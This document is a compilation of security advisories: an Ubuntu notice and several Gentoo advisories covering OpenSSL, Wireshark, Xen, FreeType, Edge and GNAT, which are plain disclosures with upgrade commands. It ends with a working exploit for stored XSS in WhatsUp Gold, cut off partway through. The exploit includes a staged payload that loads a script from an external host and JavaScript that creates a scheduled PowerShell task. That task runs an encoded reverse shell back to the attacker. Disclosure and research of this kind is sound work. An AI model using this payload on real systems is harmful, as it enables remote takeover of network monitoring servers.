Ubuntu Security Notice 6622-1 - David Benjamin discovered that OpenSSL incorrectly handled excessively long X9.42 DH keys. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, leading to a denial of service. Sverker Eriksson discovered that OpenSSL incorrectly handled POLY1304 MAC on the PowerPC architecture. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS and Ubuntu 23.04.

==========================================================================  
Ubuntu Security Notice USN-6622-1  
February 05, 2024

openssl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in OpenSSL.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

David Benjamin discovered that OpenSSL incorrectly handled excessively long  
X9.42 DH keys. A remote attacker could possibly use this issue to cause  
OpenSSL to consume resources, leading to a denial of service.  
(CVE-2023-5678)

Sverker Eriksson discovered that OpenSSL incorrectly handled POLY1304 MAC  
on the PowerPC architecture. A remote attacker could use this issue to  
cause OpenSSL to crash, resulting in a denial of service, or possibly  
execute arbitrary code. This issue only affected Ubuntu 22.04 LTS and  
Ubuntu 23.04. (CVE-2023-6129)

It was discovered that OpenSSL incorrectly handled excessively long RSA  
public keys. A remote attacker could possibly use this issue to cause  
OpenSSL to consume resources, leading to a denial of service. This issue  
only affected Ubuntu 22.04 LTS and Ubuntu 23.04. (CVE-2023-6237)

Bahaa Naamneh discovered that OpenSSL incorrectly handled certain malformed  
PKCS12 files. A remote attacker could possibly use this issue to cause  
OpenSSL to crash, resulting in a denial of service. (CVE-2024-0727)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libssl3                         3.0.10-1ubuntu2.2

Ubuntu 22.04 LTS:  
   libssl3                         3.0.2-0ubuntu1.14

Ubuntu 20.04 LTS:  
   libssl1.1                       1.1.1f-1ubuntu2.21

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6622-1  
   CVE-2023-5678, CVE-2023-6129, CVE-2023-6237, CVE-2024-0727

Package Information:  
   https://launchpad.net/ubuntu/+source/openssl/3.0.10-1ubuntu2.2  
   https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.14  
   https://launchpad.net/ubuntu/+source/openssl/1.1.1f-1ubuntu2.21

Ubuntu Security Notice USN-6622-1

Gentoo Linux Security Advisory 202402-9 - Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark. Versions greater than or equal to 4.0.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Wireshark: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #915224, #917421  
       ID: 202402-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple out-of-bounds read vulnerabilities have been discovered in  
Wireshark.

Background  
==========

Wireshark is a versatile network protocol analyzer.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-analyzer/wireshark  < 4.0.11      >= 4.0.11

Description  
===========

Multiple vulnerabilities have been discovered in Wireshark. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-4.0.11"

References  
==========

[ 1 ] CVE-2023-5371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5371  
[ 2 ] CVE-2023-6174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6174  
[ 3 ] WNPA-SEC-2023-27  
[ 4 ] WNPA-SEC-2023-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-09

Gentoo Linux Security Advisory 202402-8 - Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service. Versions greater than or equal to 3.0.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenSSL: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #876787, #893446, #902779, #903545, #907413, #910556, #911560  
       ID: 202402-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in OpenSSL, the worst of which  
could result in denial of service.

Background  
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer  
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general  
purpose cryptography library.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/openssl  < 3.0.10      >= 3.0.10

Description  
===========

Multiple vulnerabilities have been discovered in OpenSSL. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenSSL users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/openssl-3.0.10"

References  
==========

[ 1 ] CVE-2022-3358  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3358  
[ 2 ] CVE-2022-4203  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4203  
[ 3 ] CVE-2022-4304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4304  
[ 4 ] CVE-2022-4450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4450  
[ 5 ] CVE-2023-0215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0215  
[ 6 ] CVE-2023-0216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0216  
[ 7 ] CVE-2023-0217  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0217  
[ 8 ] CVE-2023-0286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0286  
[ 9 ] CVE-2023-0401  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0401  
[ 10 ] CVE-2023-0464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0464  
[ 11 ] CVE-2023-0465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0465  
[ 12 ] CVE-2023-0466  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0466  
[ 13 ] CVE-2023-2650  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2650  
[ 14 ] CVE-2023-2975  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2975  
[ 15 ] CVE-2023-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3446  
[ 16 ] CVE-2023-3817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3817

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-08

Gentoo Linux Security Advisory 202402-7 - Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 4.16.6_pre1 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Xen: Multiple Vulnerabilities     Date: February 04, 2024     Bugs: #754105, #757126, #826998, #837575, #858122, #876790, #879031, #903624, #905389, #915970       ID: 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been found in Xen, the worst of which canlead to arbitrary code execution.Background==========Xen is a bare-metal hypervisor.Affected packages=================Package            Vulnerable     Unaffected-----------------  -------------  --------------app-emulation/xen  < 4.16.6_pre1  >= 4.16.6_pre1Description===========Multiple vulnerabilities have been discovered in Xen. Please review theCVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Xen users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.16.6_pre1"References==========[ 1 ] CVE-2021-28703      https://nvd.nist.gov/vuln/detail/CVE-2021-28703[ 2 ] CVE-2021-28704      https://nvd.nist.gov/vuln/detail/CVE-2021-28704[ 3 ] CVE-2021-28705      https://nvd.nist.gov/vuln/detail/CVE-2021-28705[ 4 ] CVE-2021-28706      https://nvd.nist.gov/vuln/detail/CVE-2021-28706[ 5 ] CVE-2021-28707      https://nvd.nist.gov/vuln/detail/CVE-2021-28707[ 6 ] CVE-2021-28708      https://nvd.nist.gov/vuln/detail/CVE-2021-28708[ 7 ] CVE-2021-28709      https://nvd.nist.gov/vuln/detail/CVE-2021-28709[ 8 ] CVE-2022-23816      https://nvd.nist.gov/vuln/detail/CVE-2022-23816[ 9 ] CVE-2022-23824      https://nvd.nist.gov/vuln/detail/CVE-2022-23824[ 10 ] CVE-2022-23825      https://nvd.nist.gov/vuln/detail/CVE-2022-23825[ 11 ] CVE-2022-26356      https://nvd.nist.gov/vuln/detail/CVE-2022-26356[ 12 ] CVE-2022-26357      https://nvd.nist.gov/vuln/detail/CVE-2022-26357[ 13 ] CVE-2022-26358      https://nvd.nist.gov/vuln/detail/CVE-2022-26358[ 14 ] CVE-2022-26359      https://nvd.nist.gov/vuln/detail/CVE-2022-26359[ 15 ] CVE-2022-26360      https://nvd.nist.gov/vuln/detail/CVE-2022-26360[ 16 ] CVE-2022-26361      https://nvd.nist.gov/vuln/detail/CVE-2022-26361[ 17 ] CVE-2022-27672      https://nvd.nist.gov/vuln/detail/CVE-2022-27672[ 18 ] CVE-2022-29900      https://nvd.nist.gov/vuln/detail/CVE-2022-29900[ 19 ] CVE-2022-29901      https://nvd.nist.gov/vuln/detail/CVE-2022-29901[ 20 ] CVE-2022-33746      https://nvd.nist.gov/vuln/detail/CVE-2022-33746[ 21 ] CVE-2022-33747      https://nvd.nist.gov/vuln/detail/CVE-2022-33747[ 22 ] CVE-2022-33748      https://nvd.nist.gov/vuln/detail/CVE-2022-33748[ 23 ] CVE-2022-33749      https://nvd.nist.gov/vuln/detail/CVE-2022-33749[ 24 ] CVE-2022-42309      https://nvd.nist.gov/vuln/detail/CVE-2022-42309[ 25 ] CVE-2022-42310      https://nvd.nist.gov/vuln/detail/CVE-2022-42310[ 26 ] CVE-2022-42319      https://nvd.nist.gov/vuln/detail/CVE-2022-42319[ 27 ] CVE-2022-42320      https://nvd.nist.gov/vuln/detail/CVE-2022-42320[ 28 ] CVE-2022-42321      https://nvd.nist.gov/vuln/detail/CVE-2022-42321[ 29 ] CVE-2022-42322      https://nvd.nist.gov/vuln/detail/CVE-2022-42322[ 30 ] CVE-2022-42323      https://nvd.nist.gov/vuln/detail/CVE-2022-42323[ 31 ] CVE-2022-42324      https://nvd.nist.gov/vuln/detail/CVE-2022-42324[ 32 ] CVE-2022-42325      https://nvd.nist.gov/vuln/detail/CVE-2022-42325[ 33 ] CVE-2022-42326      https://nvd.nist.gov/vuln/detail/CVE-2022-42326[ 34 ] CVE-2022-42327      https://nvd.nist.gov/vuln/detail/CVE-2022-42327[ 35 ] CVE-2022-42330      https://nvd.nist.gov/vuln/detail/CVE-2022-42330[ 36 ] CVE-2022-42331      https://nvd.nist.gov/vuln/detail/CVE-2022-42331[ 37 ] CVE-2022-42332      https://nvd.nist.gov/vuln/detail/CVE-2022-42332[ 38 ] CVE-2022-42333      https://nvd.nist.gov/vuln/detail/CVE-2022-42333[ 39 ] CVE-2022-42334      https://nvd.nist.gov/vuln/detail/CVE-2022-42334[ 40 ] CVE-2022-42335      https://nvd.nist.gov/vuln/detail/CVE-2022-42335[ 41 ] XSA-351[ 42 ] XSA-355[ 43 ] XSA-385[ 44 ] XSA-387[ 45 ] XSA-388[ 46 ] XSA-389[ 47 ] XSA-397[ 48 ] XSA-399[ 49 ] XSA-400[ 50 ] XSA-407[ 51 ] XSA-412[ 52 ] XSA-414[ 53 ] XSA-415[ 54 ] XSA-416[ 55 ] XSA-417[ 56 ] XSA-418[ 57 ] XSA-419[ 58 ] XSA-420[ 59 ] XSA-421[ 60 ] XSA-422[ 61 ] XSA-425[ 62 ] XSA-430Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202402-07Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-07

Gentoo Linux Security Advisory 202402-6 - Multiple vulnerabilities have been discovered in FreeType, the worst of which can lead to remote code execution. Versions greater than or equal to 2.13.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeType: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #840224, #881443  
       ID: 202402-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in FreeType, the worst of  
which can lead to remote code execution.

Background  
==========

FreeType is a high-quality and portable font engine.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/freetype  < 2.13.0      >= 2.13.0

Description  
===========

Multiple vulnerabilities have been discovered in FreeType. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FreeType users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/freetype-2.13.0"

References  
==========

[ 1 ] CVE-2022-27404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27404  
[ 2 ] CVE-2022-27405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27405  
[ 3 ] CVE-2022-27406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27406  
[ 4 ] CVE-2023-2004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2004

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-06

Gentoo Linux Security Advisory 202402-5 - Multiple vulnerabilities have been discovered in Microsoft Edge, the worst of which could lead to remote code execution. Versions greater than or equal to 120.0.2210.61 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Microsoft Edge: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #907817, #908518, #918586, #919495  
       ID: 202402-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Microsoft Edge, the  
worst of which could lead to remote code execution.

Background  
==========

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable       Unaffected  
-------------------------  ---------------  ----------------  
www-client/microsoft-edge  < 120.0.2210.61  >= 120.0.2210.61

Description  
===========

Multiple vulnerabilities have been discovered in Microsoft Edge. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.61"

References  
==========

[ 1 ] CVE-2023-29345  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29345  
[ 2 ] CVE-2023-33143  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33143  
[ 3 ] CVE-2023-33145  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33145  
[ 4 ] CVE-2023-35618  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35618  
[ 5 ] CVE-2023-36022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36022  
[ 6 ] CVE-2023-36029  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36029  
[ 7 ] CVE-2023-36034  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36034  
[ 8 ] CVE-2023-36409  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36409  
[ 9 ] CVE-2023-36559  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36559  
[ 10 ] CVE-2023-36562  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36562  
[ 11 ] CVE-2023-36727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36727  
[ 12 ] CVE-2023-36735  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36735  
[ 13 ] CVE-2023-36741  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36741  
[ 14 ] CVE-2023-36787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36787  
[ 15 ] CVE-2023-36880  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36880  
[ 16 ] CVE-2023-38174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38174

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-05

Gentoo Linux Security Advisory 202402-4 - A vulnerability has been discovered in GNAT Ada Suite which can lead to remote code execution. Versions prior to 2019-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNAT Ada Suite: Remote Code Execution  
     Date: February 03, 2024  
     Bugs: #787440  
       ID: 202402-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GNAT Ada Suite which can lead to  
remote code execution.

Background  
==========

The GNAT Ada Suite is an Ada development environment.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
dev-ada/gnat-suite-bin  < 2019-r2     Vulnerable!

Description  
===========

A vulnerability has been discovered in GNAT Ada Suite. Please review the  
CVE identifier referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for GNAT Ada Suite. We recommend that  
users unmerge it:

  # emerge --ask --depclean "dev-ada/gnat-suite-bin"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-04

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft 